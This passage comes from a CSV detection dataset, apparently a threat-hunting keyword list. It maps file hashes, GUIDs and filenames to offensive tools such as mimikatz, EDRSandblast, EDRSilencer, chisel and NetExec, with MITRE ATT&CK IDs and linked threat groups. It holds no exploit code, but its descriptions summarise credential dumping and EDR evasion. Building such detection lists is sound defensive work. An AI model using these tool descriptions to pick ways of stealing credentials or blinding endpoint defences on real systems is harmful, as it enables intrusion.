Access","https://github.com/ProcessusT/HEKATOMB","1","0","#filehash","N/A","10","6","510","59","2024-07-31T19:05:30Z","2022-09-09T15:07:15Z","42792" "*eda049d723876d9783aa850feafc7aba3297ff8af282606d2a8c899ba591c7d7*",".{0,1000}eda049d723876d9783aa850feafc7aba3297ff8af282606d2a8c899ba591c7d7.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","42793" "*eda3dc681554b274b5cdf9cdc4d1d2248a45ed61a3f309210d1a79bab4e53113*",".{0,1000}eda3dc681554b274b5cdf9cdc4d1d2248a45ed61a3f309210d1a79bab4e53113.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - 
T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","42794" "*eda5a3b5c4316ec711ae975cdf6a483e244ac195e06254a0e9bade484d9c0533*",".{0,1000}eda5a3b5c4316ec711ae975cdf6a483e244ac195e06254a0e9bade484d9c0533.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","42795" "*eda5a3b5c4316ec711ae975cdf6a483e244ac195e06254a0e9bade484d9c0533*",".{0,1000}eda5a3b5c4316ec711ae975cdf6a483e244ac195e06254a0e9bade484d9c0533.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - 
TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","42796" "*edaa2e28eee643e72776396155001db13f288d9bc64e57057127a09c1d57c9a7*",".{0,1000}edaa2e28eee643e72776396155001db13f288d9bc64e57057127a09c1d57c9a7.{0,1000}","offensive_tool_keyword","ShellServe","Multi-client network fileserver with integrated shell functionality crafted in C using system calls for efficient and direct file and command processing","T1059 - T1505 - T1046 - T1569","TA0002 - TA0007 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/7etsuo/ShellServe","1","0","#filehash","N/A","6","","N/A","","","","42797" "*edb161280fe76c89768cab2f9493295671042046f106a7686854f8b5ed118249*",".{0,1000}edb161280fe76c89768cab2f9493295671042046f106a7686854f8b5ed118249.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","42798" 
"*EDBAAABC-1214-41C0-8EEE-B61056DE37ED*",".{0,1000}EDBAAABC\-1214\-41C0\-8EEE\-B61056DE37ED.{0,1000}","offensive_tool_keyword","Stifle",".NET Post-Exploitation Utility for Abusing Explicit Certificate Mappings in ADCS","T1550.003 - T1552.004 - T1606.002","TA0006 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/logangoins/Stifle","1","0","#GUIDproject","N/A","7","2","140","9","2025-02-10T04:58:46Z","2025-02-08T06:13:43Z","42802" "*edbafeb3a54bcacd2f4b9a1beec023c20ed6346b0ba2c32a59a6d2a0c8b6cb6c*",".{0,1000}edbafeb3a54bcacd2f4b9a1beec023c20ed6346b0ba2c32a59a6d2a0c8b6cb6c.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42803" "*edcc3c97475aa95c19c8c08124fe6b9c5aac05ce4f253af391b7b1710d04b336*",".{0,1000}edcc3c97475aa95c19c8c08124fe6b9c5aac05ce4f253af391b7b1710d04b336.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","42804" "*edce2d6ebcdab01ffa6ab278bab2c628fe405c82452de36a531a6cbac98541b0*",".{0,1000}edce2d6ebcdab01ffa6ab278bab2c628fe405c82452de36a531a6cbac98541b0.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","42805" "*edcf68c388027b82dc8db46324c2cc67105a90f3689a200972331deb5dcdb887*",".{0,1000}edcf68c388027b82dc8db46324c2cc67105a90f3689a200972331deb5dcdb887.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42806" "*edd2c3b117bf18e520fc98063528a003b8958a15f731fe7646cfab0b433bf69d*",".{0,1000}edd2c3b117bf18e520fc98063528a003b8958a15f731fe7646cfab0b433bf69d.{0,1000}","offensive_tool_keyword","SharpAVKB","Windows Antivirus Comparison and Patch Number Comparison","T1082 - T1518 - T1083","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpAVKB","1","0","#filehash","N/A","4","1","58","24","2019-10-28T06:50:30Z","2019-10-14T12:44:22Z","42807" "*edd9d1b4-27f7-424a-aa21-794b19231741*",".{0,1000}edd9d1b4\-27f7\-424a\-aa21\-794b19231741.{0,1000}","offensive_tool_keyword","LsassReflectDumping","leverages 
the Process Forking technique using the RtlCreateProcessReflection API to clone the lsass.exe process. Once the clone is created - it utilizes MINIDUMP_CALLBACK_INFORMATION callbacks to generate a memory dump of the cloned process","T1003.001 - T1555.003 - T1077","TA0006","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/LsassReflectDumping","1","0","#GUIDproject","N/A","10","2","198","27","2024-10-19T08:16:13Z","2024-10-17T14:57:30Z","42808" "*eddd8cf62034d52903edacb5d07fc26220597cc98395d200fe859bd88936fc70*",".{0,1000}eddd8cf62034d52903edacb5d07fc26220597cc98395d200fe859bd88936fc70.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42809" "*EDE1D800842E11B147A6E039507EA5DCD7F825BF9AF3195F8B1FAF10080CDE77*",".{0,1000}EDE1D800842E11B147A6E039507EA5DCD7F825BF9AF3195F8B1FAF10080CDE77.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","42810" 
"*edea603b85c0e9a13eeaa8562930bd94fc5929e8300b070e89e5342ca16eca29*",".{0,1000}edea603b85c0e9a13eeaa8562930bd94fc5929e8300b070e89e5342ca16eca29.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","42812" "*edf46019fc966e2dfebe6209744075f41b8e58dcfe1d8247284e88b240149e35*",".{0,1000}edf46019fc966e2dfebe6209744075f41b8e58dcfe1d8247284e88b240149e35.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","42813" "*edf490ea415dd61542383334e235a53861419d05fcb719080ca5b31550bba737*",".{0,1000}edf490ea415dd61542383334e235a53861419d05fcb719080ca5b31550bba737.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","42814" "*edf8c7fe2bd7241aafa9109be239698bc7e840097ffaec13a6a593876bdb6e97*",".{0,1000}edf8c7fe2bd7241aafa9109be239698bc7e840097ffaec13a6a593876bdb6e97.{0,1000}","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1555.003 - T1110.003 - T1003 - 
T1081","TA0006 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/kmahyyg/mremoteng-decrypt","1","0","#filehash","N/A","8","1","83","21","2022-10-29T16:02:26Z","2019-05-11T09:09:49Z","42815" "*edf9405f4286e33ff63ec5b16f35981f52ecc1404227b043e8022cadbc01b925*",".{0,1000}edf9405f4286e33ff63ec5b16f35981f52ecc1404227b043e8022cadbc01b925.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42816" "*edfc7e6329aeeb8cb0df8734ad9083840020e9d2d81d4ae71609dc7339552a0a*",".{0,1000}edfc7e6329aeeb8cb0df8734ad9083840020e9d2d81d4ae71609dc7339552a0a.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","42817" "*edge_wscript_wsh_injection*",".{0,1000}edge_wscript_wsh_injection.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","42818" "*edge1.parrot.run*",".{0,1000}edge1\.parrot\.run.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. 
penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","42819" "*EditC2Dialog.*",".{0,1000}EditC2Dialog\..{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","0","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","42820" "*Edit-FileWMI*",".{0,1000}Edit\-FileWMI.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","N/A","10","813","146","2024-06-25T12:02:26Z","2016-05-24T14:00:14Z","42821" "*EDR Detector by trickster0*",".{0,1000}EDR\sDetector\sby\strickster0.{0,1000}","offensive_tool_keyword","EDR_Detector","detect EDR agents on a machine","T1518.001 - T1063","TA0007 - TA0009","N/A","N/A","Collection","https://github.com/trickster0/EDR_Detector","1","0","N/A","N/A","7","1","93","14","2021-11-05T08:10:05Z","2019-08-24T20:50:09Z","42823" "*EDR_Detection.exe*",".{0,1000}EDR_Detection\.exe.{0,1000}","offensive_tool_keyword","EDR_Detector","detect EDR agents on a machine","T1518.001 - T1063","TA0007 - TA0009","N/A","N/A","Collection","https://github.com/trickster0/EDR_Detector","1","1","N/A","N/A","7","1","93","14","2021-11-05T08:10:05Z","2019-08-24T20:50:09Z","42824" 
"*EDR_Detector.7z*",".{0,1000}EDR_Detector\.7z.{0,1000}","offensive_tool_keyword","EDR_Detector","detect EDR agents on a machine","T1518.001 - T1063","TA0007 - TA0009","N/A","N/A","Collection","https://github.com/trickster0/EDR_Detector","1","1","N/A","N/A","7","1","93","14","2021-11-05T08:10:05Z","2019-08-24T20:50:09Z","42825" "*EDR_Detector-master*",".{0,1000}EDR_Detector\-master.{0,1000}","offensive_tool_keyword","EDR_Detector","detect EDR agents on a machine","T1518.001 - T1063","TA0007 - TA0009","N/A","N/A","Collection","https://github.com/trickster0/EDR_Detector","1","1","N/A","N/A","7","1","93","14","2021-11-05T08:10:05Z","2019-08-24T20:50:09Z","42826" "*edraser.py -*",".{0,1000}edraser\.py\s\-.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","0","N/A","N/A","10","4","363","49","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z","42827" "*EDRaser-main*",".{0,1000}EDRaser\-main.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","N/A","10","4","363","49","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z","42828" "*EDRSandblast.c*",".{0,1000}EDRSandblast\.c.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","N/A","10","10","1633","292","2024-08-30T20:30:31Z","2021-11-02T15:02:42Z","42829" 
"*EDRSandblast.exe*",".{0,1000}EDRSandblast\.exe.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","N/A","10","10","1633","292","2024-08-30T20:30:31Z","2021-11-02T15:02:42Z","42830" "*EDRSandblast.exe*",".{0,1000}EDRSandblast\.exe.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","42831" "*EDRSandBlast.h*",".{0,1000}EDRSandBlast\.h.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","42832" "*edrsandblast.py*",".{0,1000}edrsandblast\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","42833" "*EDRSandblast.sln*",".{0,1000}EDRSandblast\.sln.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense 
Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","N/A","10","10","1633","292","2024-08-30T20:30:31Z","2021-11-02T15:02:42Z","42834" "*EDRSandblast.sln*",".{0,1000}EDRSandblast\.sln.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","42835" "*EDRSandblast.vcxproj*",".{0,1000}EDRSandblast\.vcxproj.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","42836" "*EDRSandblast_API.c*",".{0,1000}EDRSandblast_API\.c.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","42837" "*EDRSandblast_API.exe*",".{0,1000}EDRSandblast_API\.exe.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","42838" 
"*EDRSandblast_API.h*",".{0,1000}EDRSandblast_API\.h.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","42839" "*EDRSandblast_CLI*",".{0,1000}EDRSandblast_CLI.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","N/A","10","10","1633","292","2024-08-30T20:30:31Z","2021-11-02T15:02:42Z","42840" "*EDRSandblast_LsassDump*",".{0,1000}EDRSandblast_LsassDump.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","N/A","10","10","1633","292","2024-08-30T20:30:31Z","2021-11-02T15:02:42Z","42841" "*EDRSandblast_LsassDump.c*",".{0,1000}EDRSandblast_LsassDump\.c.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","42842" "*EDRSandblast_LsassDump.exe*",".{0,1000}EDRSandblast_LsassDump\.exe.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same 
result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","42843" "*EDRSandblast_StaticLibrary*",".{0,1000}EDRSandblast_StaticLibrary.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","N/A","10","10","1633","292","2024-08-30T20:30:31Z","2021-11-02T15:02:42Z","42844" "*EDRSandblast-GodFault*",".{0,1000}EDRSandblast\-GodFault.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","42845" "*EDRSandblast-master*",".{0,1000}EDRSandblast\-master.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","N/A","10","10","1633","292","2024-08-30T20:30:31Z","2021-11-02T15:02:42Z","42846" "*EDRSilencer.exe*",".{0,1000}EDRSilencer\.exe.{0,1000}","offensive_tool_keyword","EDRSilencer","A tool uses Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server","T1562.004","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/netero1010/EDRSilencer","1","1","N/A","N/A","10","10","1645","209","2024-11-03T16:05:14Z","2023-12-26T04:15:39Z","42847" "*eDY0L21pbWlrYXR6LmV4ZQ==*",".{0,1000}eDY0L21pbWlrYXR6LmV4ZQ\=\=.{0,1000}","offensive_tool_keyword","BetterSafetyKatz","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","42848" "*eDY0L21pbWlrYXR6LmV4ZQ==*",".{0,1000}eDY0L21pbWlrYXR6LmV4ZQ\=\=.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","42849" "*ee0349d1878fb3eac38c76f8d1b2fadc5c20cf08b7d0ab5a528e8a30e9a3a8e9*",".{0,1000}ee0349d1878fb3eac38c76f8d1b2fadc5c20cf08b7d0ab5a528e8a30e9a3a8e9.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","42850" 
